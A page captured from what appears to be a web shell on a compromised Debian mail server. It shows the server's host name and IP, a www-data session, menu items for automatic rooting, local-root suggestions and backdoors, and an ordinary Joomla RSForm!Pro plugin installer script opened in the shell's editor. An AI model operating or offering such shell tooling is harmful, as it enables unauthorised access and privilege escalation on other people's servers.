Linux mail.vriendennsm.nl 6.1.0-51-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.177-1 (2026-07-16) x86_64
Apache/2.4.68 (Debian)
Server IP : 217.154.75.17 & Your IP : 216.73.216.195
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
vnsm /
plugins /
system /
rsfphcaptcha /
Delete
Unzip
Name
Size
Permission
Date
Action
forms
[ DIR ]
drwxr-xr-x
2025-02-08 22:29
sql
[ DIR ]
drwxr-xr-x
2025-02-08 22:29
index.html
44
B
-rwxr-xr-x
2023-01-14 18:55
rsfphcaptcha.php
4.28
KB
-rwxr-xr-x
2023-01-14 18:55
rsfphcaptcha.xml
1.44
KB
-rwxr-xr-x
2023-01-14 18:55
script.php
2.62
KB
-rwxr-xr-x
2023-01-14 18:55
Save
Rename
<?php /** * @package RSForm!Pro * @copyright (C) 2007-2017 www.rsjoomla.com * @license GPL, http://www.gnu.org/copyleft/gpl.html */ // no direct access defined( '_JEXEC' ) or die( 'Restricted access' ); class plgSystemRsfphcaptchaInstallerScript { protected static $minJoomla = '3.9.0'; protected static $minComponent = '3.1.0'; public function preflight($type, $parent) { if ($type == 'uninstall') { return true; } try { $source = $parent->getParent()->getPath('source'); $jversion = new JVersion(); if (!$jversion->isCompatible(static::$minJoomla)) { throw new Exception(sprintf('Please upgrade to at least Joomla! %s before continuing!', static::$minJoomla)); } if (!file_exists(JPATH_ADMINISTRATOR.'/components/com_rsform/helpers/rsform.php')) { throw new Exception('Please install the RSForm! Pro component before continuing.'); } if (!file_exists(JPATH_ADMINISTRATOR.'/components/com_rsform/helpers/assets.php') || !file_exists(JPATH_ADMINISTRATOR.'/components/com_rsform/helpers/version.php')) { throw new Exception(sprintf('Please upgrade RSForm! Pro to at least version %s before continuing!', static::$minComponent)); } // Check version matches require_once JPATH_ADMINISTRATOR.'/components/com_rsform/helpers/version.php'; if (!class_exists('RSFormProVersion') || version_compare((string) new RSFormProVersion, static::$minComponent, '<')) { throw new Exception(sprintf('Please upgrade RSForm! Pro to at least version %s before continuing!', static::$minComponent)); } // All good. // Copy needed files $this->copyFiles($source); // Update? Run our SQL file if ($type == 'update') { $this->runSQL($source, 'install'); } } catch (Exception $e) { JFactory::getApplication()->enqueueMessage($e->getMessage(), 'error'); return false; } return true; } protected function copyFiles($source) { // Copy /admin files $src = $source.'/admin'; $dest = JPATH_ADMINISTRATOR.'/components/com_rsform'; if (!JFolder::copy($src, $dest, '', true)) { throw new Exception('Could not copy to '.str_replace(JPATH_ADMINISTRATOR, '', $dest).', please make sure destination is writable!'); } } protected function runSQL($source, $file) { $db = JFactory::getDbo(); $sqlfile = $source . '/sql/mysql/' . $file . '.sql'; if (file_exists($sqlfile)) { $buffer = file_get_contents($sqlfile); if ($buffer !== false) { $queries = $db->splitSql($buffer); foreach ($queries as $query) { $query = trim($query); if ($query != '') { $db->setQuery($query)->execute(); } } } } } }